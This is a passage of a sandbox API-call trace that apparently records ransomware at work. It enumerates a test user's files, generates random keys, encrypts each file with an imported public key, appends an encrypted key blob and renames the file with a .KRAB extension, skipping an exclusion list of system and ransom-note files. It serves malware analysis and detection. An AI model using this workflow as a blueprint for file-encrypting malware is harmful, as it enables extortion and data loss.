[0057.129] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.129] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0xfbca08) returned 1 [0057.130] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3600000 [0057.130] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0057.130] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0057.130] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0057.130] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0057.130] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.131] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0xfbca08) returned 1 [0057.131] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd460) returned 1 [0057.131] CryptGetKeyParam (in: hKey=0xfbd460, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0057.131] CryptEncrypt (in: hKey=0xfbd460, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x35f0000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x35f0000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0057.132] GetLastError () returned 0x0 [0057.132] CryptDestroyKey (hKey=0xfbd460) returned 1 [0057.132] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0057.132] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0xfbca08) returned 1 [0057.132] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd720) returned 1 [0057.132] CryptGetKeyParam (in: hKey=0xfbd720, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0057.132] CryptEncrypt (in: hKey=0xfbd720, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x35f0100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x35f0100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0057.133] GetLastError () returned 0x0 [0057.133] CryptDestroyKey (hKey=0xfbd720) returned 1 [0057.133] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0057.133] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\AiUWcWXY-.csv" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\aiuwcwxy-.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0057.133] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3600000 [0057.133] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0057.134] ReadFile (in: hFile=0x43c, lpBuffer=0x3600000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3600000*, lpNumberOfBytesRead=0x338ef7c*=0x14395, lpOverlapped=0x0) returned 1 [0057.161] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffebc6b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0057.162] WriteFile (in: hFile=0x43c, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x14395, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ef78*=0x14395, lpOverlapped=0x0) returned 1 [0057.162] WriteFile (in: hFile=0x43c, lpBuffer=0x35f0000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x35f0000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0057.162] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.166] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.167] CloseHandle (hObject=0x43c) returned 1 [0057.171] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.172] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\AiUWcWXY-.csv" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\aiuwcwxy-.csv"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\AiUWcWXY-.csv.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\aiuwcwxy-.csv.krab")) returned 1 [0057.172] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.173] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0057.173] lstrcmpW (lpString1="aoUv2Yf_F8W.odp", lpString2=".") returned 1 [0057.173] lstrcmpW (lpString1="aoUv2Yf_F8W.odp", lpString2="..") returned 1 [0057.173] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="aoUv2Yf_F8W.odp" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\aoUv2Yf_F8W.odp") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\aoUv2Yf_F8W.odp" [0057.173] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.173] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\aoUv2Yf_F8W.odp.KRAB") returned 58 [0057.173] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\aoUv2Yf_F8W.odp") returned 53 [0057.173] lstrlenW (lpString=".odp") returned 4 [0057.173] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3000000 [0057.174] wsprintfW (in: param_1=0x3000000, param_2="%s " | out: param_1=".odp ") returned 5 [0057.174] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.174] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\aoUv2Yf_F8W.odp") returned 53 [0057.174] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\aoUv2Yf_F8W.odp") returned 53 [0057.174] lstrcmpiW (lpString1="aoUv2Yf_F8W.odp", lpString2="desktop.ini") returned -1 [0057.174] lstrcmpiW (lpString1="aoUv2Yf_F8W.odp", lpString2="autorun.inf") returned -1 [0057.174] lstrcmpiW (lpString1="aoUv2Yf_F8W.odp", lpString2="ntuser.dat") returned -1 [0057.174] lstrcmpiW (lpString1="aoUv2Yf_F8W.odp", lpString2="iconcache.db") returned -1 [0057.174] lstrcmpiW (lpString1="aoUv2Yf_F8W.odp", lpString2="bootsect.bak") returned -1 [0057.174] lstrcmpiW (lpString1="aoUv2Yf_F8W.odp", lpString2="boot.ini") returned -1 [0057.174] lstrcmpiW (lpString1="aoUv2Yf_F8W.odp", lpString2="ntuser.dat.log") returned -1 [0057.174] lstrcmpiW (lpString1="aoUv2Yf_F8W.odp", lpString2="thumbs.db") returned -1 [0057.174] lstrcmpiW (lpString1="aoUv2Yf_F8W.odp", lpString2="KRAB-DECRYPT.html") returned -1 [0057.174] lstrcmpiW (lpString1="aoUv2Yf_F8W.odp", lpString2="KRAB-DECRYPT.txt") returned -1 [0057.174] lstrcmpiW (lpString1="aoUv2Yf_F8W.odp", lpString2="CRAB-DECRYPT.txt") returned -1 [0057.175] lstrcmpiW (lpString1="aoUv2Yf_F8W.odp", lpString2="ntldr") returned -1 [0057.175] lstrcmpiW (lpString1="aoUv2Yf_F8W.odp", lpString2="NTDETECT.COM") returned -1 [0057.175] lstrcmpiW (lpString1="aoUv2Yf_F8W.odp", lpString2="Bootfont.bin") returned -1 [0057.175] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x3000000 [0057.175] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0xfbca08) returned 1 [0057.175] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3010000 [0057.176] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0057.176] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0057.176] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0057.176] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0057.176] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.176] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0xfbca08) returned 1 [0057.177] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3010000 [0057.177] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0057.177] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0057.177] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0057.178] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0057.178] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.178] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0xfbca90) returned 1 [0057.178] CryptImportKey (in: hProv=0xfbca90, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd1e0) returned 1 [0057.178] CryptGetKeyParam (in: hKey=0xfbd1e0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0057.178] CryptEncrypt (in: hKey=0xfbd1e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3000000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x3000000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0057.179] GetLastError () returned 0x0 [0057.179] CryptDestroyKey (hKey=0xfbd1e0) returned 1 [0057.179] CryptReleaseContext (hProv=0xfbca90, dwFlags=0x0) returned 1 [0057.179] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0xfbca08) returned 1 [0057.179] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd2e0) returned 1 [0057.179] CryptGetKeyParam (in: hKey=0xfbd2e0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0057.180] CryptEncrypt (in: hKey=0xfbd2e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3000100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x3000100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0057.180] GetLastError () returned 0x0 [0057.180] CryptDestroyKey (hKey=0xfbd2e0) returned 1 [0057.180] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0057.180] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\aoUv2Yf_F8W.odp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\aouv2yf_f8w.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0057.180] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0057.181] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0057.181] ReadFile (in: hFile=0x43c, lpBuffer=0x35f0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x35f0000*, lpNumberOfBytesRead=0x338ef7c*=0xb4c, lpOverlapped=0x0) returned 1 [0057.198] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffff4b4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0057.198] WriteFile (in: hFile=0x43c, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0xb4c, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ef78*=0xb4c, lpOverlapped=0x0) returned 1 [0057.198] WriteFile (in: hFile=0x43c, lpBuffer=0x3000000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3000000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0057.198] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.229] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.229] CloseHandle (hObject=0x43c) returned 1 [0057.232] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.232] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\aoUv2Yf_F8W.odp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\aouv2yf_f8w.odp"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\aoUv2Yf_F8W.odp.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\aouv2yf_f8w.odp.krab")) returned 1 [0057.233] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.233] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0057.233] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0057.233] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0057.234] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\d2ca4a08d2ca4dee3d.lock" [0057.234] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.234] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 66 [0057.234] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\d2ca4a08d2ca4dee3d.lock") returned 61 [0057.234] lstrlenW (lpString=".lock") returned 5 [0057.234] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.234] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0057.234] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.235] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.235] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0057.235] lstrcmpW (lpString1="DW-yZoud-.gif", lpString2=".") returned 1 [0057.235] lstrcmpW (lpString1="DW-yZoud-.gif", lpString2="..") returned 1 [0057.235] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="DW-yZoud-.gif" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\DW-yZoud-.gif") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\DW-yZoud-.gif" [0057.235] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.235] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\DW-yZoud-.gif.KRAB") returned 56 [0057.235] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\DW-yZoud-.gif") returned 51 [0057.235] lstrlenW (lpString=".gif") returned 4 [0057.235] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.236] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".gif ") returned 5 [0057.236] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.236] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\DW-yZoud-.gif") returned 51 [0057.236] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\DW-yZoud-.gif") returned 51 [0057.236] lstrcmpiW (lpString1="DW-yZoud-.gif", lpString2="desktop.ini") returned 1 [0057.236] lstrcmpiW (lpString1="DW-yZoud-.gif", lpString2="autorun.inf") returned 1 [0057.236] lstrcmpiW (lpString1="DW-yZoud-.gif", lpString2="ntuser.dat") returned -1 [0057.236] lstrcmpiW (lpString1="DW-yZoud-.gif", lpString2="iconcache.db") returned -1 [0057.236] lstrcmpiW (lpString1="DW-yZoud-.gif", lpString2="bootsect.bak") returned 1 [0057.236] lstrcmpiW (lpString1="DW-yZoud-.gif", lpString2="boot.ini") returned 1 [0057.236] lstrcmpiW (lpString1="DW-yZoud-.gif", lpString2="ntuser.dat.log") returned -1 [0057.236] lstrcmpiW (lpString1="DW-yZoud-.gif", lpString2="thumbs.db") returned -1 [0057.236] lstrcmpiW (lpString1="DW-yZoud-.gif", lpString2="KRAB-DECRYPT.html") returned -1 [0057.236] lstrcmpiW (lpString1="DW-yZoud-.gif", lpString2="KRAB-DECRYPT.txt") returned -1 [0057.236] lstrcmpiW (lpString1="DW-yZoud-.gif", lpString2="CRAB-DECRYPT.txt") returned 1 [0057.237] lstrcmpiW (lpString1="DW-yZoud-.gif", lpString2="ntldr") returned -1 [0057.237] lstrcmpiW (lpString1="DW-yZoud-.gif", lpString2="NTDETECT.COM") returned -1 [0057.237] lstrcmpiW (lpString1="DW-yZoud-.gif", lpString2="Bootfont.bin") returned 1 [0057.237] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.237] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0xfbca08) returned 1 [0057.237] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0057.238] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0057.238] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0057.238] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0057.238] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0057.238] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.238] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0xfbca08) returned 1 [0057.239] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0057.239] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0057.239] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0057.239] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0057.239] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0057.240] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.240] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0xfbca08) returned 1 [0057.240] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd720) returned 1 [0057.240] CryptGetKeyParam (in: hKey=0xfbd720, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0057.240] CryptEncrypt (in: hKey=0xfbd720, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0057.241] GetLastError () returned 0x0 [0057.241] CryptDestroyKey (hKey=0xfbd720) returned 1 [0057.241] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0057.241] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0xfbca08) returned 1 [0057.241] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd3a0) returned 1 [0057.241] CryptGetKeyParam (in: hKey=0xfbd3a0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0057.241] CryptEncrypt (in: hKey=0xfbd3a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0057.242] GetLastError () returned 0x0 [0057.242] CryptDestroyKey (hKey=0xfbd3a0) returned 1 [0057.242] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0057.242] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\DW-yZoud-.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\dw-yzoud-.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0057.242] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0057.243] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0057.243] ReadFile (in: hFile=0x43c, lpBuffer=0x35f0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x35f0000*, lpNumberOfBytesRead=0x338ef7c*=0x5f6a, lpOverlapped=0x0) returned 1 [0057.257] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xffffa096, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0057.257] WriteFile (in: hFile=0x43c, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x5f6a, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ef78*=0x5f6a, lpOverlapped=0x0) returned 1 [0057.258] WriteFile (in: hFile=0x43c, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0057.258] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.262] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.262] CloseHandle (hObject=0x43c) returned 1 [0057.265] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.265] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\DW-yZoud-.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\dw-yzoud-.gif"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\DW-yZoud-.gif.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\dw-yzoud-.gif.krab")) returned 1 [0057.266] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.266] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0057.266] lstrcmpW (lpString1="e-ADlMBN_O.mp4", lpString2=".") returned 1 [0057.266] lstrcmpW (lpString1="e-ADlMBN_O.mp4", lpString2="..") returned 1 [0057.266] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="e-ADlMBN_O.mp4" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\e-ADlMBN_O.mp4") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\e-ADlMBN_O.mp4" [0057.266] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.267] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\e-ADlMBN_O.mp4.KRAB") returned 57 [0057.267] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\e-ADlMBN_O.mp4") returned 52 [0057.267] lstrlenW (lpString=".mp4") returned 4 [0057.267] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.267] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".mp4 ") returned 5 [0057.267] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.267] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\e-ADlMBN_O.mp4") returned 52 [0057.267] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\e-ADlMBN_O.mp4") returned 52 [0057.267] lstrcmpiW (lpString1="e-ADlMBN_O.mp4", lpString2="desktop.ini") returned 1 